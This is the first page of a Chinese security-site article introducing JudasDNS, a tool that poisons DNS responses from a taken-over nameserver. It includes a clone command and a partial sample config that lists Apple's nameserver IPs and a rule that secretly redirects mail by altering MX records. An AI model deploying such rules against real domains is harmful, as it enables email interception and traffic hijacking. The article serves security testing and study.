欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

JudasDNS:域名服务器DNS投毒测试工具

来源:本站整理 作者:佚名 时间:2020-03-15 TAG: 我要投稿


JudasDNS是一款针对DNS域名服务器的安全测试工具,在JudasDNS的帮助下,广大安全研究人员可以方便地对目标域名服务器进行DNS投毒攻击测试,以确保域名服务器的安全性。
JudasDNS可以帮助研究人员构建和部署DNS代理服务器,并代替已接管的域名服务器以执行目标攻击。JudasDNS可以代理某个域名的合法域名服务器的所有DNS查询请求,JudasDNS的规则配置允许我们根据源IP或DNS查询类型来修改DNS响应,这也就意味着攻击者可以配置一台恶意域名服务器来实现:有选择地重新路由来自指定源IP地址范围(通过修改的MX记录)的入站电子邮件,设置数据长度非常长的TTL,或执行DNS缓存投毒等攻击活动。
工具下载
广大用户可以直接点击下列链接直接下载已打包的JudasDNS:【JudasDNS-master.zip】
或者,你也可以运行下列命令直接将项目源码克隆至本地:
git clone https://github.com/mandatoryprogrammer/JudasDNS.git

如何使用JudasDNS
下面给出的是JudasDNS针对测试样例场景中的配置样本代码,在这个场景中,我们已经拿到了或接管了一台苹果的权威域名服务器(apple.com):
{
        "version": "1.0.0",
        "port": 2248,
        "dns_query_timeout": 10000,
        "target_nameservers": [ "17.254.0.59", "17.254.0.50", "17.112.144.50", "17.112.144.59", "17.171.63.30", "17.171.63.40", "17.151.0.151", "17.151.0.152" ],
        "rules": [
            {
                "name": "Secretly redirect all emails coming from 127.0.0.1!",
                "query_type_matches": [ "MX" ],
                "ip_range_matches": [ "127.0.0.1/32" ],
                "modifications": [
                    {
                        "answer": [
                            {
                                "name": "apple.com",
                                "type": 15,
                                "class": 1,
                                "ttl": 10,
                                "priority": 10,
                                "exchange": "hacktheplace.localhost"
                            }
                        ]
                    }
                ]
            },
            {

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载